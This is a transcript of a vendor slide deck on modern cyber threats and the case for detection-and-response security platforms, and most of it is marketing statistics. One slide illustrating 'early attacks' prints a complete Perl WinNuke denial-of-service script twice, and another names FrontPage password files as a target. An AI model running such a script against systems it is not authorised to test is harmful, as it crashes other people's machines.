Presentation is loading. Please wait.

Presentation is loading. Please wait.

1 | Company Confidential The Modern Cyber Threat Pandemic Cameron Erens LogRhythm.

Published byBerniece Cooper Modified over 8 years ago

Similar presentations

Presentation on theme: "1 | Company Confidential The Modern Cyber Threat Pandemic Cameron Erens LogRhythm."— Presentation transcript:

1 1 | Company Confidential The Modern Cyber Threat Pandemic Cameron Erens LogRhythm

2 2 | Company Confidential When Times Were Simpler

3 3 | Company Confidential Early Attacks #!/usr/bin/perl # use strict; use Socket; my($h,$p,$in_addr,$proto,$addr); $h = "$ARGV[0]"; $p = 139 if (!$ARGV[1]); if (!$h) { print "A hostname must be provided. Ex: www.microsoft.com\n"; } $in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr); $proto = getprotobyname('tcp'); socket(S, AF_INET, SOCK_STREAM, $proto) or die $!; connect(S,$addr) or die $!; select S; $| = 1; select STDOUT; print "Nuking: $h:$p\n"; send S,"Sucker",MSG_OOB; print "Nuked!\n"; close S; #!/usr/bin/perl # use strict; use Socket; my($h,$p,$in_addr,$proto,$addr); $h = "$ARGV[0]"; $p = 139 if (!$ARGV[1]); if (!$h) { print "A hostname must be provided. Ex: www.microsoft.com\n"; } $in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr); $proto = getprotobyname('tcp'); socket(S, AF_INET, SOCK_STREAM, $proto) or die $!; connect(S,$addr) or die $!; select S; $| = 1; select STDOUT; print "Nuking: $h:$p\n"; send S,"Sucker",MSG_OOB; print "Nuked!\n"; close S;

4 4 | Company Confidential Early Attacks \_vti_pvt\ o Administrators.pwd o Authors.pwd

5 5 | Company Confidential Fast forward to 2015

6 6 | Company Confidential The Economist, November 2015 “Attackers will still get in…the only safe assumption is that your network is breached, and to make sure that you deal with intruders promptly—not after the 200-odd days which it typically takes. Many networks have no means of detecting a breach at all.”

7 7 | Company Confidential Attackers Are Getting In of surveyed firms were compromised by a successful cyber-attack in 2014 71% “There are two kinds of big companies in the United States: those who've been hacked by the Chinese and those who don't know they've been hacked by the Chinese.” – October 5, 2014 James Comey, Director FBI The CyberEdge Group, 2015 Cyberthreat Defense Report (1) Note 1. Survey includes 624 IT security professionals from North America and Europe representing organizations with more than 500 global employees

8 8 | Company Confidential The Expanding Cyber Threat Motive PoliticalIdeologicalCriminal

9 9 | Company Confidential Ever Increasing Cyber Risk Inappropriate Network Use Zero Day Attacks Credit Card Theft Compliance Violations Custom Malware Insider Threats MALWARE Phishing Breach INTRUSION Fraud State Sponsored Attacks Privilege Account Abuse spear phishing Denial of Service Compromised Endpoints BruteForcing Unintended Disclosure Trojan Horses MiTM Attacks Ransomware Payment Card Fraud Social Engineering Data Exfiltration Whaling Hijacking Keyloggers Source: PwC’s The Global State of Information Security Survey 2015 2014 42.8 MILLION 2013 28.9 MILLION 2012 24.9 MILLION 2011 22.7 MILLION 2010 9.4 MILLION 2009 3.4 MILLION 66% Growth in Security Incidents

10 10 | Company Confidential Damaging Data Breaches

11 11 | Company Confidential Big Data Analytics can best detect these threats An Excellent Security Intelligence Platform Delivers: Big Data analytics to identify advanced threats Qualified and prioritized detection, reducing noise Incident response workflow orchestration and automation Capabilities to prevent high- impact breaches & damaging cyber incidents However, advanced threats: Require a broader view to recognize Only emerge over time Get lost in the noise Prevention-centric approaches can stop common threats A New Security Approach is Required

12 Prevention-Centric Approaches Firewalls Intrusion Prevention Systems Anti-Virus/Malware Sandboxing 205 Median number of days that companies were compromised before detection of threat - Mandiant M-Trends 2015 205 Median number of days that companies were compromised before detection of threat - Mandiant M-Trends 2015 Preventable Threats Previously Seen Signature-Based Static One-Dimensional Prevention-Centric Approaches are Insufficient Modern Cyber Threats Advanced Stealthy Persistent Dynamic Multi-Dimensional

13 13 | Company Confidential Prevention-Centric is Obsolete “Advanced targeted attacks make prevention-centric strategies obsolete. Securing enterprises in 2020 will require a shift to information and people-centric security strategies, combined with pervasive internal monitoring and sharing of security intelligence.” “By 2020, 60% of enterprise information security budgets will be allocated for rapid detection and response approaches up from less than 10% in 2013.” - Neil MacDonald,

14 14 | Company Confidential Faster Detection & Response Reduces Risk High VulnerabilityLow Vulnerability Months Days Hours Minutes Weeks MTTD & MTTR MEAN-TIME-TO-DETECT (MTTD) The average time it takes to recognize a threat requiring further analysis and response efforts MEAN-TIME-TO-RESPOND (MTTR) The average time it takes to respond and ultimately resolve the incident As organizations improve their ability to quickly detect and respond to threats, the risk of experiencing a damaging breach is greatly reduced Exposed to ThreatsResilient to Threats

15 15 | Company Confidential Data Exfiltration Can Be Avoided Advanced threats take their time and leverage the holistic attack surface Early neutralization = no damaging cyber incident or data breach Initial Compromise Command & Control Lateral Movement Target Attainment Exfiltration Corruption Disruption Reconnaissance ATTACK

16 16 | Company Confidential Vigilance Requires Visibility at Every Vector User Network Endpoint Holistic Attack Surface Endpoint User Network User Network User Endpoint User Network User Network Endpoint User Network Endpoint Network Endpoint User Network Endpoint User Network User

17 17 | Company Confidential Security Intelligence Platform TIME TO DETECT TIME TO RESPOND Recover Cleanup Report Review Adapt Neutralize Implement countermeasures to mitigate threat and associated risk Investigate Analyze threat to determine nature and extent of the incident Threat Lifecycle Management: End-to-End Detection & Response Workflow Qualify Assess threat to determine risk and whether full investigation is necessary Detect & Prioritize User Analytics Machine Analytics Collect & Generate Forensic Sensor Data Security Event Data Example Sources Log & Machine Data Example Sources

18 18 | Company Confidential Delivering a Path to Success Security Intelligence Maturity Levels Level 0: Blind Level 1: Minimally Complaint Level 2: Securely Compliant Level 3: Vigilant Level 4: Resilient MEAN-TIME-TO-DETECT (MTTD) MEAN-TIME-TO-RESPOND (MTTR) Greater threat resiliency is achieved at higher levels of security intelligence maturity Months Days Hours Minutes Weeks Timeframe Level 0Level 1Level 2Level 3Level 4 Exposed to ThreatsResilient to Threats

19 19 | Company Confidential Market Leadership Certifications & Validations Industry Awards Company Awards Company of the Year Industry Analysts

20 20 | Company Confidential Cameron.Erens@logrhythm.com THANK YOU

Download ppt "1 | Company Confidential The Modern Cyber Threat Pandemic Cameron Erens LogRhythm."

Similar presentations

1© Copyright 2011 EMC Corporation. All rights reserved. The Future of the Advance Soc 3rd Annual Privacy, Access and Security Congress, Ottawa, 2012 Mike.

1© Copyright 2011 EMC Corporation. All rights reserved. The Future of the Advance Soc 3rd Annual Privacy, Access and Security Congress, Ottawa, 2012 Mike.
© 2013 Bradford Networks. All rights reserved. Rapid Threat Response From 7 Days to 7 Seconds.

© 2013 Bradford Networks. All rights reserved. Rapid Threat Response From 7 Days to 7 Seconds.
Security Life Cycle for Advanced Threats

Security Life Cycle for Advanced Threats
Security intelligence: solving the puzzle for actionable insight Fran Howarth Senior analyst, security Bloor Research.

Security intelligence: solving the puzzle for actionable insight Fran Howarth Senior analyst, security Bloor Research.
1© Copyright 2014 EMC Corporation. All rights reserved. Securing the Cloud Gintaras Pelenis Field Technologist RSA, the Security Division of EMC

1© Copyright 2014 EMC Corporation. All rights reserved. Securing the Cloud Gintaras Pelenis Field Technologist RSA, the Security Division of EMC
© 2013 AT&T Intellectual Property. All rights reserved. AT&T, the AT&T logo and all other AT&T marks contained herein are trademarks of AT&T Intellectual.

© 2013 AT&T Intellectual Property. All rights reserved. AT&T, the AT&T logo and all other AT&T marks contained herein are trademarks of AT&T Intellectual.
SPEAKER BLITZ ERIC BROWN Senior Systems Engineer NICK JAVANOVIC DoD Regional Sales Manager.

SPEAKER BLITZ ERIC BROWN Senior Systems Engineer NICK JAVANOVIC DoD Regional Sales Manager.
Radware DoS / DDoS Attack Mitigation System Orly Sorokin January 2013.

Radware DoS / DDoS Attack Mitigation System Orly Sorokin January 2013.
©2014 Bit9. All Rights Reserved Building a Continuous Response Architecture.

©2014 Bit9. All Rights Reserved Building a Continuous Response Architecture.
Cyber Security Discussion Craig D’Abreo – VP Security Operations.

Cyber Security Discussion Craig D’Abreo – VP Security Operations.
© 2012 Solera Networks. Contains confidential, proprietary, and trade secret information of Solera Networks. Any use of this work without express written.

© 2012 Solera Networks. Contains confidential, proprietary, and trade secret information of Solera Networks. Any use of this work without express written.
Cyber crime on the rise. Recent cyber attacks How it happens? Distributed denial of service Whaling Rootkits Keyloggers Trojan horses Botnets Worms Viruses.

Cyber crime on the rise. Recent cyber attacks How it happens? Distributed denial of service Whaling Rootkits Keyloggers Trojan horses Botnets Worms Viruses.
Did You Hear That Alarm? The impacts of hitting the information security snooze button.

Did You Hear That Alarm? The impacts of hitting the information security snooze button.
Staying Ahead of the Curve in Cyber Security Bill Chang CEO, SingTel Group Enterprise.

Staying Ahead of the Curve in Cyber Security Bill Chang CEO, SingTel Group Enterprise.
Dell Connected Security Solutions Simplify & unify.

Dell Connected Security Solutions Simplify & unify.
Managing Data Against Insider Threats Dr. John D. Johnson, CISSP.

Managing Data Against Insider Threats Dr. John D. Johnson, CISSP.
GSHRM Conference Cyber Security Education Shri Cockroft, CISO Piedmont Healthcare, Inc. September 21, 2015.

GSHRM Conference Cyber Security Education Shri Cockroft, CISO Piedmont Healthcare, Inc. September 21, 2015.
The Changing World of Endpoint Protection

The Changing World of Endpoint Protection
Nexthink V5 Demo Security – Malicious Anomaly. Situation › Avoid damage resulting from the incident itself and the cost of the unplanned response › Protection.

Nexthink V5 Demo Security – Malicious Anomaly. Situation › Avoid damage resulting from the incident itself and the cost of the unplanned response › Protection.
HP World September 2002 Scott S. Blake, CISSP Vice President, Information Security BindView Corporation Vulnerability Assessment and Action.

HP World September 2002 Scott S. Blake, CISSP Vice President, Information Security BindView Corporation Vulnerability Assessment and Action.

Similar presentations

Ads by Google